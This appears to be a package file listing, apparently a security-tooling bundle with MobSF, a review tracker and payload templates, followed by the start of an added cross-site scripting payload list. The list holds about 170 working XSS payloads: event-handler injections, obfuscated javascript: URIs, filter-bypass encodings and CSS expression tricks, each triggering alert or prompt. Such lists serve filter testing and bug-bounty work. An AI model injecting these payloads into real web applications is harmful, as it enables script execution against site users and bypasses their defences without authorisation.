- package/MobSF/mobsf/StaticAnalyzer/views/ios/classdump.py +112 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/code_analysis.py +103 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/db_interaction.py +177 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/file_analysis.py +85 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/file_recon.py +63 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/icon_analysis.py +73 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/macho_analysis.py +255 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/permission_analysis.py +90 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/plist_analysis.py +150 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/rules/__init__.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/rules/ios_apis.yaml +85 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/rules/ipa_rules.py +226 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/rules/objective_c_rules.yaml +355 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/rules/swift_rules.yaml +461 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/static_analyzer.py +282 -0
- package/MobSF/mobsf/StaticAnalyzer/views/ios/view_source.py +155 -0
- package/MobSF/mobsf/StaticAnalyzer/views/sast_engine.py +71 -0
- package/MobSF/mobsf/StaticAnalyzer/views/shared_func.py +424 -0
- package/MobSF/mobsf/StaticAnalyzer/views/windows/__init__.py +0 -0
- package/MobSF/mobsf/StaticAnalyzer/views/windows/db_interaction.py +130 -0
- package/MobSF/mobsf/StaticAnalyzer/views/windows/windows.py +590 -0
- package/MobSF/mobsf/__init__.py +0 -0
- package/MobSF/mobsf/__main__.py +49 -0
- package/MobSF/mobsf/install/__init__.py +0 -0
- package/MobSF/mobsf/install/windows/__init__.py +0 -0
- package/MobSF/mobsf/install/windows/config.txt +26 -0
- package/MobSF/mobsf/install/windows/readme.md +43 -0
- package/MobSF/mobsf/install/windows/rpc_client.py +191 -0
- package/MobSF/mobsf/install/windows/setup.py +433 -0
- package/MobSF/mobsf/signatures/IP2LOCATION-LITE-DB5.IPV6.BIN +0 -0
- package/MobSF/mobsf/signatures/exodus_trackers +1 -0
- package/MobSF/mobsf/signatures/maltrail-malware-domains.txt +157958 -0
- package/MobSF/mobsf/signatures/malwaredomainlist +2256 -0
- package/MobSF/mobsf/static/adminlte/dashboard/css/adminlte.min.css +12 -0
- package/MobSF/mobsf/static/adminlte/dashboard/css/adminlte.min.css.map +1 -0
- package/MobSF/mobsf/static/adminlte/dashboard/js/adminlte.min.js +7 -0
- package/MobSF/mobsf/static/adminlte/dashboard/js/adminlte.min.js.map +1 -0
- package/MobSF/mobsf/static/adminlte/plugins/bootstrap/bootstrap.bundle.min.js +7 -0
- package/MobSF/mobsf/static/adminlte/plugins/bootstrap/bootstrap.bundle.min.js.map +1 -0
- package/MobSF/mobsf/static/adminlte/plugins/datatables/jquery.dataTables.min.js +166 -0
- package/MobSF/mobsf/static/adminlte/plugins/datatables-bs4/dataTables.bootstrap4.min.css +1 -0
- package/MobSF/mobsf/static/adminlte/plugins/datatables-bs4/dataTables.bootstrap4.min.js +8 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/all.css +4423 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/all.min.css +5 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/brands.css +14 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/brands.min.css +5 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/fontawesome.css +4390 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/fontawesome.min.css +5 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/regular.css +15 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/regular.min.css +5 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/solid.css +16 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/solid.min.css +5 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/svg-with-js.css +371 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/svg-with-js.min.css +5 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/v4-shims.css +2166 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/css/v4-shims.min.css +5 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-brands-400.eot +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-brands-400.svg +3496 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-brands-400.ttf +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-brands-400.woff +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-brands-400.woff2 +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-regular-400.eot +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-regular-400.svg +803 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-regular-400.ttf +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-regular-400.woff +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-regular-400.woff2 +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-solid-900.eot +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-solid-900.svg +4667 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-solid-900.ttf +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-solid-900.woff +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/fontawesome-free/webfonts/fa-solid-900.woff2 +0 -0
- package/MobSF/mobsf/static/adminlte/plugins/jquery-ui.min.js +13 -0
- package/MobSF/mobsf/static/adminlte/plugins/jquery.min.js +2 -0
- package/MobSF/mobsf/static/adminlte/plugins/overlayScrollbars/css/OverlayScrollbars.min.css +13 -0
- package/MobSF/mobsf/static/adminlte/plugins/overlayScrollbars/js/jquery.overlayScrollbars.min.js +13 -0
- package/MobSF/mobsf/static/adminlte/plugins/sweetalert2/sweetalert2.min.css +1 -0
- package/MobSF/mobsf/static/adminlte/plugins/sweetalert2/sweetalert2.min.js +1 -0
- package/MobSF/mobsf/static/amcharts/animated.js +1 -0
- package/MobSF/mobsf/static/amcharts/core.js +1 -0
- package/MobSF/mobsf/static/amcharts/maps.js +1 -0
- package/MobSF/mobsf/static/amcharts/worldIndiaLow.js +20 -0
- package/MobSF/mobsf/static/codemirror/codemirror.css +350 -0
- package/MobSF/mobsf/static/codemirror/codemirror.js +9803 -0
- package/MobSF/mobsf/static/codemirror/javascript-lint.js +65 -0
- package/MobSF/mobsf/static/codemirror/javascript.js +945 -0
- package/MobSF/mobsf/static/codemirror/jshint.js +29591 -0
- package/MobSF/mobsf/static/codemirror/lint.css +71 -0
- package/MobSF/mobsf/static/codemirror/lint.js +259 -0
- package/MobSF/mobsf/static/enlighterjs/enlighterjs.enlighter.min.css +3 -0
- package/MobSF/mobsf/static/enlighterjs/enlighterjs.min.css +15 -0
- package/MobSF/mobsf/static/enlighterjs/enlighterjs.min.js +3 -0
- package/MobSF/mobsf/static/fonts/Open_Sans/LICENSE.txt +202 -0
- package/MobSF/mobsf/static/fonts/Open_Sans/OpenSans-Regular.ttf +0 -0
- package/MobSF/mobsf/static/fonts/Oswald/OFL.txt +93 -0
- package/MobSF/mobsf/static/fonts/Oswald/Oswald-Regular.ttf +0 -0
- package/MobSF/mobsf/static/img/favicon.ico +0 -0
- package/MobSF/mobsf/static/img/loading.jpg +0 -0
- package/MobSF/mobsf/static/img/mobsf_icon.png +0 -0
- package/MobSF/mobsf/static/img/mobsf_logo.png +0 -0
- package/MobSF/mobsf/static/img/no_icon.png +0 -0
- package/MobSF/mobsf/static/jsTree/custom.css +114 -0
- package/MobSF/mobsf/static/jsTree/jstree.min.js +6 -0
- package/MobSF/mobsf/static/jsTree/themes/default/32px.png +0 -0
- package/MobSF/mobsf/static/jsTree/themes/default/40px.png +0 -0
- package/MobSF/mobsf/static/jsTree/themes/default/content_background.gif +0 -0
- package/MobSF/mobsf/static/jsTree/themes/default/dir.gif +0 -0
- package/MobSF/mobsf/static/jsTree/themes/default/file.png +0 -0
- package/MobSF/mobsf/static/jsTree/themes/default/style.min.css +1 -0
- package/MobSF/mobsf/static/jsTree/themes/default/throbber.gif +0 -0
- package/MobSF/mobsf/static/landing/css/home.css +310 -0
- package/MobSF/mobsf/static/others/css/devices.min.css +1 -0
- package/MobSF/mobsf/static/others/css/pdf_report.css +123 -0
- package/MobSF/mobsf/static/others/css/spinner.css +168 -0
- package/MobSF/mobsf/static/others/css/terminal.css +79 -0
- package/MobSF/mobsf/static/others/css/xcode.min.css +1 -0
- package/MobSF/mobsf/static/terminal/terminal.css +79 -0
- package/MobSF/mobsf/templates/base/base_layout.html +123 -0
- package/MobSF/mobsf/templates/dynamic_analysis/android/dynamic_analyzer.html +1064 -0
- package/MobSF/mobsf/templates/dynamic_analysis/android/dynamic_report.html +1017 -0
- package/MobSF/mobsf/templates/dynamic_analysis/android/frida_logs.html +48 -0
- package/MobSF/mobsf/templates/dynamic_analysis/android/live_api.html +103 -0
- package/MobSF/mobsf/templates/dynamic_analysis/android/logcat.html +56 -0
- package/MobSF/mobsf/templates/dynamic_analysis/dynamic_analysis.html +328 -0
- package/MobSF/mobsf/templates/general/about.html +30 -0
- package/MobSF/mobsf/templates/general/apidocs.html +2201 -0
- package/MobSF/mobsf/templates/general/error.html +23 -0
- package/MobSF/mobsf/templates/general/home.html +298 -0
- package/MobSF/mobsf/templates/general/not_found.html +22 -0
- package/MobSF/mobsf/templates/general/recent.html +254 -0
- package/MobSF/mobsf/templates/general/search.html +35 -0
- package/MobSF/mobsf/templates/general/view.html +124 -0
- package/MobSF/mobsf/templates/general/zip.html +31 -0
- package/MobSF/mobsf/templates/pdf/android_report.html +930 -0
- package/MobSF/mobsf/templates/pdf/ios_report.html +760 -0
- package/MobSF/mobsf/templates/pdf/windows_report.html +211 -0
- package/MobSF/mobsf/templates/static_analysis/android_binary_analysis.html +2006 -0
- package/MobSF/mobsf/templates/static_analysis/android_source_analysis.html +1502 -0
- package/MobSF/mobsf/templates/static_analysis/compare.html +917 -0
- package/MobSF/mobsf/templates/static_analysis/ios_binary_analysis.html +1299 -0
- package/MobSF/mobsf/templates/static_analysis/ios_source_analysis.html +1125 -0
- package/MobSF/mobsf/templates/static_analysis/source_tree.html +332 -0
- package/MobSF/mobsf/templates/static_analysis/treeview_file.html +1 -0
- package/MobSF/mobsf/templates/static_analysis/treeview_folder.html +5 -0
- package/MobSF/mobsf/templates/static_analysis/windows_binary_analysis.html +411 -0
- package/MobSF/requirements.txt +30 -0
- package/MobSF/run.bat +19 -0
- package/MobSF/run.sh +48 -0
- package/MobSF/scripts/__init__.py +0 -0
- package/MobSF/scripts/check_install.py +28 -0
- package/MobSF/scripts/clean.bat +31 -0
- package/MobSF/scripts/clean.sh +43 -0
- package/MobSF/scripts/entrypoint.sh +8 -0
- package/MobSF/scripts/install_java_wkhtmltopdf.sh +33 -0
- package/MobSF/scripts/mass_static_analysis.py +95 -0
- package/MobSF/scripts/postgres_support.sh +11 -0
- package/MobSF/scripts/stack/docker-compose.yml +15 -0
- package/MobSF/scripts/update_android_permissions.py +46 -0
- package/MobSF/setup.bat +81 -0
- package/MobSF/setup.py +61 -0
- package/MobSF/setup.sh +76 -0
- package/MobSF/tox.ini +94 -0
- package/Notes/AWS Security.pdf +0 -0
- package/Notes/Android Security.pdf +0 -0
- package/Notes/Web Security.pdf +0 -0
- package/Screenshot 2022-03-10 at 11.57.37 AM.png +0 -0
- package/Security Bug Demo.mov +0 -0
- package/Security Review.mov +0 -0
- package/Templates/CRLF.txt +61 -0
- package/Templates/cors.html +26 -0
- package/Templates/openredirect.txt +860 -0
- package/Templates/secrets.py +102 -0
- package/Templates/vhost.txt +174 -0
- package/Templates/wordlist.txt +6038 -0
- package/Templates/xss.txt +2691 -0
- package/cloneall.sh +26 -0
- package/index.js +46 -0
- package/meesecops/.dockerignore +6 -0
- package/meesecops/Dockerfile +15 -0
- package/meesecops/LICENSE +201 -0
- package/meesecops/README.md +2 -0
- package/meesecops/README_secops.md +206 -0
- package/meesecops/Workflows/1-factor.png +0 -0
- package/meesecops/Workflows/2-factor.png +0 -0
- package/meesecops/__init__.py +0 -0
- package/meesecops/application/__init__.py +23 -0
- package/meesecops/application/jira_functions.py +554 -0
- package/meesecops/application/static/css/close_style.css +151 -0
- package/meesecops/application/static/css/style.css +358 -0
- package/meesecops/application/static/external/1.16.0.popper.min.js +5 -0
- package/meesecops/application/static/external/bootstrap.min.css +5 -0
- package/meesecops/application/static/external/bootstrap.min.js +7 -0
- package/meesecops/application/static/external/css.css +48 -0
- package/meesecops/application/static/external/index.js +607 -0
- package/meesecops/application/static/external/jquery-1.12.4.js +11008 -0
- package/meesecops/application/static/fonts/glyphicons-halflings-regular.woff2 +0 -0
- package/meesecops/application/static/fonts/hacked.woff +0 -0
- package/meesecops/application/static/images/ajax-loader.gif +0 -0
- package/meesecops/application/static/images/favicon.png +0 -0
- package/meesecops/application/static/images/glogin.png +0 -0
- package/meesecops/application/static/images/logo3.png +0 -0
- package/meesecops/application/static/images/sort_asc.png +0 -0
- package/meesecops/application/static/images/sort_both.png +0 -0
- package/meesecops/application/static/images/sort_desc.png +0 -0
- package/meesecops/application/static/options.json +62 -0
- package/meesecops/application/static/request_options.json +721 -0
- package/meesecops/application/static/robots.txt +2 -0
- package/meesecops/application/templates/close_tickets.html +261 -0
- package/meesecops/application/templates/footer.html +15 -0
- package/meesecops/application/templates/index.html +337 -0
- package/meesecops/application/templates/login.html +50 -0
- package/meesecops/application/templates/nav.html +63 -0
- package/meesecops/application/templates/new_secreview.html +92 -0
- package/meesecops/application/templates/search_tickets.html +77 -0
- package/meesecops/application/templates/security_updates.html +82 -0
- package/meesecops/application/views.py +536 -0
- package/meesecops/config.py +206 -0
- package/meesecops/logs/README.txt +1 -0
- package/meesecops/logs/access_log +0 -0
- package/meesecops/requirements.txt +32 -0
- package/meesecops/run.py +100 -0
- package/meesecops/screenshot/1.png +0 -0
- package/meesecops/screenshot/2.png +0 -0
- package/meesecops/screenshot/3.png +0 -0
- package/meesecops/screenshot/4-1.png +0 -0
- package/meesecops/screenshot/4.png +0 -0
- package/meesecops/screenshot/5.png +0 -0
- package/meesecops/screenshot/6.png +0 -0
- package/meesecops/screenshot/7.png +0 -0
- package/meesecops/ssl/README.txt +1 -0
- package/package.json +11 -0
- package/prod.pem +27 -0
- package/test1.py +133 -0
|
@@ -0,0 +1,2691 @@
|
|
|
1
|
+
"-prompt(8)-"
|
|
2
|
+
'-prompt(8)-'
|
|
3
|
+
";a=prompt,a()//
|
|
4
|
+
';a=prompt,a()//
|
|
5
|
+
'-eval("window['pro'%2B'mpt'](8)")-'
|
|
6
|
+
"-eval("window['pro'%2B'mpt'](8)")-"
|
|
7
|
+
"onclick=prompt(8)>"@x.y
|
|
8
|
+
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
|
|
9
|
+
<image/src/onerror=prompt(8)>
|
|
10
|
+
<img/src/onerror=prompt(8)>
|
|
11
|
+
<image src/onerror=prompt(8)>
|
|
12
|
+
<img src/onerror=prompt(8)>
|
|
13
|
+
<image src =q onerror=prompt(8)>
|
|
14
|
+
<img src =q onerror=prompt(8)>
|
|
15
|
+
</scrip</script>t><img src =q onerror=prompt(8)>
|
|
16
|
+
<script\x20type="text/javascript">javascript:alert(1);</script>
|
|
17
|
+
<script\x3Etype="text/javascript">javascript:alert(1);</script>
|
|
18
|
+
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
|
|
19
|
+
<script\x09type="text/javascript">javascript:alert(1);</script>
|
|
20
|
+
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
|
|
21
|
+
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
|
|
22
|
+
<script\x0Atype="text/javascript">javascript:alert(1);</script>
|
|
23
|
+
'`"><\x3Cscript>javascript:alert(1)</script>
|
|
24
|
+
'`"><\x00script>javascript:alert(1)</script>
|
|
25
|
+
<img src=1 href=1 onerror="javascript:alert(1)"></img>
|
|
26
|
+
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
|
|
27
|
+
<video src=1 href=1 onerror="javascript:alert(1)"></video>
|
|
28
|
+
<body src=1 href=1 onerror="javascript:alert(1)"></body>
|
|
29
|
+
<image src=1 href=1 onerror="javascript:alert(1)"></image>
|
|
30
|
+
<object src=1 href=1 onerror="javascript:alert(1)"></object>
|
|
31
|
+
<script src=1 href=1 onerror="javascript:alert(1)"></script>
|
|
32
|
+
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
|
|
33
|
+
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
|
|
34
|
+
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
|
|
35
|
+
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
|
|
36
|
+
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
|
|
37
|
+
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
|
|
38
|
+
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
|
|
39
|
+
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
|
|
40
|
+
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
|
|
41
|
+
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
|
|
42
|
+
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
|
|
43
|
+
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
|
|
44
|
+
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
|
|
45
|
+
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
|
|
46
|
+
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
|
|
47
|
+
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
|
|
48
|
+
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
|
|
49
|
+
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
|
|
50
|
+
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
|
|
51
|
+
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
|
|
52
|
+
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
|
|
53
|
+
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
|
|
54
|
+
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
|
|
55
|
+
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
|
|
56
|
+
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
|
|
57
|
+
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
|
|
58
|
+
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
|
|
59
|
+
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
|
|
60
|
+
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
|
|
61
|
+
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
|
|
62
|
+
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
|
|
63
|
+
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
|
|
64
|
+
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
|
|
65
|
+
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
|
|
66
|
+
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
|
|
67
|
+
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
|
|
68
|
+
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
|
|
69
|
+
<object onError object onError="javascript:javascript:alert(1)"></object onError>
|
|
70
|
+
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
|
|
71
|
+
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
|
|
72
|
+
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
|
|
73
|
+
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
|
|
74
|
+
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
|
|
75
|
+
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
|
|
76
|
+
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
|
|
77
|
+
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
|
|
78
|
+
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
|
|
79
|
+
<body onload body onload="javascript:javascript:alert(1)"></body onload>
|
|
80
|
+
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
|
|
81
|
+
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
|
|
82
|
+
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
|
|
83
|
+
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
|
|
84
|
+
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
|
|
85
|
+
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
|
|
86
|
+
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
|
|
87
|
+
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
|
|
88
|
+
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
|
|
89
|
+
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
|
|
90
|
+
\x3Cscript>javascript:alert(1)</script>
|
|
91
|
+
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
|
|
92
|
+
<script>javascript:alert(1)</script\x0D
|
|
93
|
+
<script>javascript:alert(1)</script\x0A
|
|
94
|
+
<script>javascript:alert(1)</script\x0B
|
|
95
|
+
<script charset="\x22>javascript:alert(1)</script>
|
|
96
|
+
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
|
|
97
|
+
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
98
|
+
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
99
|
+
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
100
|
+
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
101
|
+
`"'><img src='#\x27 onerror=javascript:alert(1)>
|
|
102
|
+
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
|
|
103
|
+
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
|
|
104
|
+
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
105
|
+
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
106
|
+
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
107
|
+
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
108
|
+
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
109
|
+
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
110
|
+
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
111
|
+
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
112
|
+
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
113
|
+
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
114
|
+
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
115
|
+
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
116
|
+
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
117
|
+
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
118
|
+
<script>/* *\x2A/javascript:alert(1)// */</script>
|
|
119
|
+
<script>/* *\x00/javascript:alert(1)// */</script>
|
|
120
|
+
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
121
|
+
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
122
|
+
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
123
|
+
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
124
|
+
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
125
|
+
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
|
|
126
|
+
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
|
|
127
|
+
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
|
|
128
|
+
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
|
|
129
|
+
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
|
|
130
|
+
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
|
|
131
|
+
'`"><\x3Cscript>javascript:alert(1)</script>
|
|
132
|
+
'`"><\x00script>javascript:alert(1)</script>
|
|
133
|
+
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
|
|
134
|
+
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
|
|
135
|
+
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
|
|
136
|
+
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
|
|
137
|
+
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
|
|
138
|
+
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
|
|
139
|
+
<script\x20type="text/javascript">javascript:alert(1);</script>
|
|
140
|
+
<script\x3Etype="text/javascript">javascript:alert(1);</script>
|
|
141
|
+
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
|
|
142
|
+
<script\x09type="text/javascript">javascript:alert(1);</script>
|
|
143
|
+
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
|
|
144
|
+
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
|
|
145
|
+
<script\x0Atype="text/javascript">javascript:alert(1);</script>
|
|
146
|
+
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
|
|
147
|
+
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
|
|
148
|
+
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
|
|
149
|
+
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
|
|
150
|
+
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
|
|
151
|
+
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
|
|
152
|
+
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
|
|
153
|
+
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
|
|
154
|
+
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
|
|
155
|
+
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
|
|
156
|
+
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
|
|
157
|
+
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
|
|
158
|
+
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
|
|
159
|
+
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
|
|
160
|
+
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
|
|
161
|
+
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
|
|
162
|
+
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
|
|
163
|
+
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
|
|
164
|
+
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
|
|
165
|
+
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
|
|
166
|
+
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
|
|
167
|
+
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
|
|
168
|
+
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
|
|
169
|
+
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
|
|
170
|
+
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
|
|
171
|
+
